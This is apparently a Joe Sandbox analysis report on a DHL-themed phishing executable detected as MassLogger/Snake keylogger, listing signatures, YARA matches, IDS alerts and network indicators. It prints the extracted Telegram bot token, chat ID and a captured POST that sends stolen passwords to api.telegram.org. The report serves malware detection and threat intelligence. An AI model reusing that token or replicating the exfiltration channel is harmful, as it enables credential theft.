Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

Overview

General Information

Sample name:DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
Analysis ID:1629834
MD5:d45fff48d75acf82385ac74580662c30
SHA1:98da0ec9c1e4704ca3fe62b9d29396b874f8fa30
SHA256:e6a62cde2fa594e289dfdd4247f068ae5dc523174646615b312a20af28e90487
Tags:DHLexeuser-abuse_ch
Infos:

Detection

MSIL Logger, MassLogger RAT
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Telegram RAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7303504110:AAFrHdCZZNIjaxiLly7_Fjy5Tv_jE3zFKA0/sendMessage"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7303504110:AAFrHdCZZNIjaxiLly7_Fjy5Tv_jE3zFKA0", "Telegram Chatid": "7319393351"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
        00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2754f:$a1: get_encryptedPassword
          • 0x27877:$a2: get_encryptedUsername
          • 0x272ea:$a3: get_timePasswordChanged
          • 0x2740b:$a4: get_passwordField
          • 0x27565:$a5: set_encryptedPassword
          • 0x28ec1:$a7: get_logins
          • 0x28b72:$a8: GetOutlookPasswords
          • 0x28964:$a9: StartKeylogger
          • 0x28e11:$a10: KeyLoggerEventArgs
          • 0x289c1:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 24 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpackJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
                0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0xf1b7:$a1: get_encryptedPassword
                  • 0xf4df:$a2: get_encryptedUsername
                  • 0xef52:$a3: get_timePasswordChanged
                  • 0xf073:$a4: get_passwordField
                  • 0xf1cd:$a5: set_encryptedPassword
                  • 0x10b29:$a7: get_logins
                  • 0x107da:$a8: GetOutlookPasswords
                  • 0x105cc:$a9: StartKeylogger
                  • 0x10a79:$a10: KeyLoggerEventArgs
                  • 0x10629:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 24 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-05T08:34:34.496110+010020577441Malware Command and Control Activity Detected192.168.2.649733149.154.167.220443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-05T08:34:26.959962+010028032742Potentially Bad Traffic192.168.2.649711132.226.8.16980TCP
                  2025-03-05T08:34:33.413202+010028032742Potentially Bad Traffic192.168.2.649711132.226.8.16980TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-05T08:34:34.064553+010018100081Potentially Bad Traffic192.168.2.649733149.154.167.220443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7303504110:AAFrHdCZZNIjaxiLly7_Fjy5Tv_jE3zFKA0", "Telegram Chatid": "7319393351"}
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4552.3.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7303504110:AAFrHdCZZNIjaxiLly7_Fjy5Tv_jE3zFKA0/sendMessage"}
                  Multi AV Scanner detection for submitted file
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeVirustotal: Detection: 31%Perma Link
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeReversingLabs: Detection: 26%
                  Joe Sandbox ML detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49714 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49733 version: TLS 1.2
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: NKUn.pdb source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: Binary string: NKUn.pdbSHA2569x source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 05365782h3_2_05365358
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 053651B9h3_2_05364F08
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 05365782h3_2_053656AF
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0544D088h3_2_0544CDE0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 05441935h3_2_054415F8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 05440FF1h3_2_05440D48
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0544C7D8h3_2_0544C530
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0544F028h3_2_0544ED80
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 05443EF8h3_2_05443C50
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0544DEC8h3_2_0544DC20
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0544E778h3_2_0544E4D0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0544BF28h3_2_0544BC80
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 05440741h3_2_05440498
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 054431F0h3_2_05442F48
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0544B220h3_2_0544AF78
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 05443AA0h3_2_054437F8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0544A0C0h3_2_05449E18
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0544F8D8h3_2_0544F630
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0544A970h3_2_0544A6C8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0544D93Ah3_2_0544D690
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0544EBD0h3_2_0544E928
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0544F480h3_2_0544F1D8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0544CC30h3_2_0544C988
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 05441449h3_2_054411A0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 054402E9h3_2_05440040
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0544E320h3_2_0544E078
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0544BAD0h3_2_0544B828
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0544C380h3_2_0544C0D8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 05440B99h3_2_054408F0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 05444350h3_2_054440A8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0544ADC8h3_2_0544AB20
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0544B678h3_2_0544B3D0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 05443648h3_2_054433A0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0544A518h3_2_0544A270
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0544D4E0h3_2_0544D238
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 05442D98h3_2_05442AF0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0544FD30h3_2_0544FA88

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:49733 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:49733 -> 149.154.167.220:443
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7303504110:AAFrHdCZZNIjaxiLly7_Fjy5Tv_jE3zFKA0/sendDocument?chat_id=7319393351&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd5b8e42c46e6eHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49711 -> 132.226.8.169:80
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49714 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: unknownHTTP traffic detected: POST /bot7303504110:AAFrHdCZZNIjaxiLly7_Fjy5Tv_jE3zFKA0/sendDocument?chat_id=7319393351&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd5b8e42c46e6eHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000003034000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000003034000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.orgd
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002F5F000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000003034000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002F5F000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000003034000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.2130367951.0000000003B91000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4568374575.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002F7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002F7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000003034000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000003034000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.2130367951.0000000003B91000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4568374575.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000003034000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7303504110:AAFrHdCZZNIjaxiLly7_Fjy5Tv_jE3zFKA0/sendDocument?chat_id=7319
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.2130367951.0000000003B91000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002F5F000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4568374575.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49733 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to log keystrokes (.Net Source)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000003.00000002.4568374575.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.2130367951.0000000003B91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6716, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 4552, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0706618C0_2_0706618C
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_070673A80_2_070673A8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0706617D0_2_0706617D
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_071464DE0_2_071464DE
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0714A6A80_2_0714A6A8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_071494080_2_07149408
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_07148FD00_2_07148FD0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_07148B980_2_07148B98
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0714AAE00_2_0714AAE0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_053627B53_2_053627B5
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0536C1683_2_0536C168
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_05364F083_2_05364F08
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_05367E683_2_05367E68
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0536CA583_2_0536CA58
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_05362DD13_2_05362DD1
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_05367E593_2_05367E59
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_05364EF83_2_05364EF8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0536B9E03_2_0536B9E0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_054445003_2_05444500
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544CDE03_2_0544CDE0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_054415F83_2_054415F8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_05441C583_2_05441C58
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_054477703_2_05447770
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_054469983_2_05446998
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_05440D483_2_05440D48
